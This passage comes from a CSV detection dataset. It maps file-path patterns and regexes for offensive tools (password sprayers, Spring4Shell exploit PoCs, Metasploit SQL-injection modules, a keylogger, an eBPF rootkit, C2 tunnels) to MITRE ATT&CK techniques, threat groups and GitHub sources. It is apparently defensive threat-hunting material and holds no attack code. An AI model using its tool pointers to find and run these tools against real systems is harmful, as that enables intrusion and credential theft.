Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","11543"
"*/SpoolTrigger.x64.dll*",".{0,1000}\/SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11544"
"*/SpoolTrigger.x86.dll*",".{0,1000}\/SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11545"
"*/spray/spray.py*",".{0,1000}\/spray\/spray\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","11546"
"*/Spray365*",".{0,1000}\/Spray365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","11547"
"*/Spray-AD.*",".{0,1000}\/Spray\-AD\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","11548"
"*/SprayAD.exe*",".{0,1000}\/SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","11549"
"*/Spray-AD/*",".{0,1000}\/Spray\-AD\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","11550"
"*/spraycharles.git*",".{0,1000}\/spraycharles\.git.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11551"
"*/spraycharles.py*",".{0,1000}\/spraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11552"
"*/sprayed-creds.txt*",".{0,1000}\/sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11553"
"*/sprayers/owa.py*",".{0,1000}\/sprayers\/owa\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11554"
"*/sprayhound.git*",".{0,1000}\/sprayhound\.git.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","11555"
"*/sprayhound/*.py*",".{0,1000}\/sprayhound\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","11556"
"*/spraying.py*",".{0,1000}\/spraying\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","11557"
"*/SprayingToolkit*",".{0,1000}\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11558"
"*/SprayingToolkit.git*",".{0,1000}\/SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11559"
"*/SprayLove.py*",".{0,1000}\/SprayLove\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","11560"
"*/spray-results.txt*",".{0,1000}\/spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11561"
"*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","11562"
"*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","N/A","4","366","108","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z","11563"
"*/SpringCore0day*",".{0,1000}\/SpringCore0day.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","11564"
"*/spring-core-rce*",".{0,1000}\/spring\-core\-rce.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","11565"
"*/Spring-CVE/*",".{0,1000}\/Spring\-CVE\/.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z","11566"
"*/SpringFramework_CVE-2022-22965_RCE*",".{0,1000}\/SpringFramework_CVE\-2022\-22965_RCE.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","#linux","N/A","N/A","1","75","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z","11567"
"*/springshell-rce-poc*",".{0,1000}\/springshell\-rce\-poc.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","N/A","1","19","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z","11568"
"*/Spyndicapped.exe*",".{0,1000}\/Spyndicapped\.exe.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","11569"
"*/Spyndicapped.git*",".{0,1000}\/Spyndicapped\.git.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","11570"
"*/sql_inj.txt*",".{0,1000}\/sql_inj\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","11571"
"*/SQLC2.ps1*",".{0,1000}\/SQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","11572"
"*/sqli.txt*",".{0,1000}\/sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","11573"
"*/sqli/mssqli*",".{0,1000}\/sqli\/mssqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11574"
"*/sqli/mysqli*",".{0,1000}\/sqli\/mysqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11575"
"*/sqli/postgresqli*",".{0,1000}\/sqli\/postgresqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11576"
"*/sqli/sqlitei*",".{0,1000}\/sqli\/sqlitei.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11577"
"*/sqli/utils*",".{0,1000}\/sqli\/utils.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11578"
"*/sqli_test.rb*",".{0,1000}\/sqli_test\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11579"
"*/Sqlmap*",".{0,1000}\/Sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","11580"
"*/sqlmap.zip*",".{0,1000}\/sqlmap\.zip.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codewatchorg/sqlipy","1","1","N/A","network exploitation tool","N/A","3","254","92","2024-06-19T23:38:41Z","2014-09-22T03:25:42Z","11581"
"*/SQLRecon*",".{0,1000}\/SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","11582"
"*/sqrtZeroKnowledge/CVE-*",".{0,1000}\/sqrtZeroKnowledge\/CVE\-.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","11583"
"*/src/common/c&c.h*",".{0,1000}\/src\/common\/c\&c\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","11584"
"*/src/exploit.html.tpl*",".{0,1000}\/src\/exploit\.html\.tpl.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","11585"
"*/src/gTunnel/configured*",".{0,1000}\/src\/gTunnel\/configured.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11587"
"*/src/gTunnel/gserver/*",".{0,1000}\/src\/gTunnel\/gserver\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11588"
"*/src/gTunnel/logs*",".{0,1000}\/src\/gTunnel\/logs.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","11589"
